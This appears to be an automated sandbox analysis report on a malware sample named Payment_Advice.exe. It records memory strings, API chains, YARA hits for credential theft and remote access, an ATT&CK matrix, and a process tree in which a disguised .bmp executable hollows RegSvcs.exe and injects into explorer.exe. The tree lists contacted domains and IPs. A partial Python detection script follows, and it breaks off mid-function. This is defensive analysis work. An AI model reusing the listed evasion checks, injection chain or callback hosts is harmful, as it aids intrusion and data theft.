          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \l_^[memstr_5c6502a5-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |$,tmemstr_3d8704f0-e
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s?;n|t:memstr_d77cd50b-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h-s*jmemstr_22917339-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+l$ memstr_23269f36-7
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f|pswmemstr_0d81c729-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rv9|$memstr_35c56ca1-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h-s.jmemstr_70063f97-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ju/uqmemstr_1a6b4e0c-8
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t$ ;l$(rmemstr_24f9725e-6
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$ ;t$$rmemstr_1a517423-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+l$0memstr_0aa423d6-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8pwmemstr_b0bc0efa-a
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \$@uvmemstr_94928dd3-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;l$,|3;memstr_3ff74dce-c
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y+l$4memstr_5c1410f4-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0j$y+memstr_f9427bf6-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$,y+memstr_677ac659-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j y+l$0memstr_4472a18b-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ro9|$(samemstr_c2e66c4b-3
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$8pqmemstr_3e754682-1
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tdf9+trmemstr_aa1bf8f5-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a;t$$memstr_f9ab006c-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kd$ a;memstr_1927e7db-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0@fmemstr_b8fc94a9-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _suvwmemstr_2409cb2a-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d$0pjememstr_3fe3b637-4
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^(^[ymemstr_6d43acb7-f
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tj9o ue9omemstr_0ef7e557-d
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uuuujmemstr_b7e9103e-b
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hpfcvmemstr_225e4ed6-2
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j xf9memstr_09e9f52b-9
          Source: Payment_Advice.exe, 00000000.00000003.1373244279.0000000006FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hpfcvmemstr_66a836dc-5
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_001D1A91
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_00173312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00173312
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DEB81 mouse_event,6_2_001DEB81
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001D1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_001D1EF3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001D13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_001D13F2
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000788F000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp, ewdbwwfpdh.bmp.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1603000018.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603076190.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601700548.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: ewdbwwfpdh.bmp, explorer.exe, 0000000F.00000002.3850804547.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000F.00000000.1584312886.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3843273425.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.3842529276.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540709138.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1540652612.0000000000F45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: explorer.exe, 0000000F.00000002.3843273425.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1584701050.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
          Source: fjrpidauk.jpg.0.dr | Binary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: explorer.exe, 0000000F.00000002.3843273425.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1584701050.0000000001090000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000F.00000000.1592153566.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0051AF0F
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,16_2_00A46854
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00A48572
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00A49310
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051F654 cpuid 0_2_0051F654
          Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0051DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0051DF1E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001ABCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_001ABCF2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001CE5F8 GetUserNameW,6_2_001CE5F8
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 0_2_0050B146 GetVersionExW,0_2_0050B146
          Source: ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000002.1607858795.0000000001026000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1602301908.0000000001025000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVGUI.exe
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
          Source: ewdbwwfpdh.bmp, 00000006.00000002.1607737663.000000000100B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601630284.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1604570490.000000000100A000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601873902.0000000001008000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601782208.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1601348945.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp, 00000006.00000003.1603782046.000000000100A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: regshot.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: ewdbwwfpdh.bmp | Binary or memory string: WIN_81
          Source: ewdbwwfpdh.bmp | Binary or memory string: WIN_XP
          Source: ewdbwwfpdh.bmp.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: ewdbwwfpdh.bmp | Binary or memory string: WIN_XPe
          Source: ewdbwwfpdh.bmp | Binary or memory string: WIN_VISTA
          Source: ewdbwwfpdh.bmp | Binary or memory string: WIN_7
          Source: ewdbwwfpdh.bmp | Binary or memory string: WIN_8

          Remote Access Functionality

          Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001F2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_001F2163
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001F1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_001F1B61
          MITRE ATT&CK Matrix (techniques listed per tactic; a number in front of a technique is the count shown in the matrix cell)

          Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
          Execution: 1 Scripting; 1 Native API; 1 Shared Modules; 2 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
          Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
          Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 912 Process Injection; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
          Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Scripting; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Rootkit; 1 Masquerading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 912 Process Injection
          Credential Access: 1 Credential API Hooking; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
          Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 127 System Information Discovery; 461 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery; Permission Groups Discovery; Local Groups
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
          Collection: 1 Archive Collected Data; 1 Credential API Hooking; 21 Input Capture; 12 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
          Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph
ID: 1320960 | Sample: Payment_Advice.exe | Startdate: 06/10/2023 | Architecture: WINDOWS | Score: 100

Top-level network: www.usbulletinnow.com; www.tygyro.com; 10 other IPs or domains
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

Process tree (started = child process created; injected = code written into an already running process):

Payment_Advice.exe (started)
    dropped: C:\Users\user\AppData\...\ewdbwwfpdh.bmp, PE32
    signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    +-- wscript.exe (started)
        signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
        +-- cmd.exe (started)
        |   signatures: Uses ipconfig to lookup or modify the Windows network settings; Tries to detect virtualization through RDTSC time measurements
        |   +-- ewdbwwfpdh.bmp (started)
        |   |   signatures: Multi AV Scanner detection for dropped file; Found API chain indicative of sandbox detection; Contains functionality to inject code into remote processes; 5 other signatures
        |   |   +-- RegSvcs.exe (started)
        |   |   |   signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        |   |   |   +-- explorer.exe (injected)
        |   |   |       network: www.tygyro.com 103.224.182.242, port 49720 -> 80, TRELLIAN-AS-APTrellianPtyLimitedAU, Australia; www.othersidewear.com 77.222.40.147, port 49711 -> 80, SWEB-ASRU, Russian Federation; 6 other IPs or domains
        |   |   |       signatures: System process connects to network (likely due to code injection or exploit)
        |   |   |       +-- cmd.exe (started)
        |   |   |           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
        |   |   |           +-- cmd.exe (started)
        |   |   |               +-- conhost.exe (started)
        |   |   +-- RegSvcs.exe (started)
        |   |       signatures: Tries to detect virtualization through RDTSC time measurements
        |   +-- conhost.exe (started)
        +-- cmd.exe (started)
            +-- conhost.exe (started)
            +-- ipconfig.exe (started)
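The chain in the graph above (Payment_Advice.exe starting wscript.exe, cmd.exe executing a dropped PE that carries a .bmp extension, that file launching RegSvcs.exe, which then hollows explorer.exe) is what an endpoint detection would key on. The following Python is an added example and not part of the Joe Sandbox report: it replays constructed process-creation events that mirror the chain (only the dropped file's path is taken from the report; the other full paths, the PIDs and the sets of "peer" script hosts, .NET utilities and recon tools are assumptions) and flags the steps a practitioner would alert on. The injection into explorer.exe and the beacons sent from it are not process creations, so they need memory or network telemetry that this check does not cover.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image")

# Constructed process-creation events mirroring the behavior graph above. Only the
# dropped file's path comes from the report; PIDs and the other full paths are assumptions.
EVENTS = [
    Event(100, 1,   r"C:\Users\user\Desktop\Payment_Advice.exe"),
    Event(101, 100, r"C:\Windows\System32\wscript.exe"),
    Event(102, 101, r"C:\Windows\System32\cmd.exe"),
    Event(103, 101, r"C:\Windows\System32\cmd.exe"),
    Event(104, 102, r"C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp"),
    Event(105, 103, r"C:\Windows\System32\ipconfig.exe"),
    Event(106, 104, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
    Event(107, 104, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
]

USER_WRITABLE = re.compile(r"^[a-z]:\\users\\", re.I)
SYSTEM_DIRS = re.compile(r"^[a-z]:\\(windows|program files( \(x86\))?)\\", re.I)
IMAGE_EXT = (".bmp", ".jpg", ".jpeg", ".png", ".gif")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}            # assumed peer set
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe"}       # assumed peer set
RECON = {"ipconfig.exe", "whoami.exe", "systeminfo.exe", "nltest.exe"}  # assumed peer set


def basename(path):
    return path.rsplit("\\", 1)[-1]


def ancestry(events, pid):
    """Root-to-leaf chain of image names ('a.exe > b.exe'); stops on an unknown or cyclic ppid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(chain))


def flag(events):
    """Return (pid, rule) pairs for the steps of the chain worth alerting on."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image).lower()
        parent = by_pid.get(e.ppid)
        # A PE executed under an image-file extension (ewdbwwfpdh.bmp is PE32 in the report).
        if name.endswith(IMAGE_EXT):
            hits.append((e.pid, "image_extension_running_as_process"))
        if parent is None:
            continue
        # wscript.exe launched by a binary that lives in a user-writable location.
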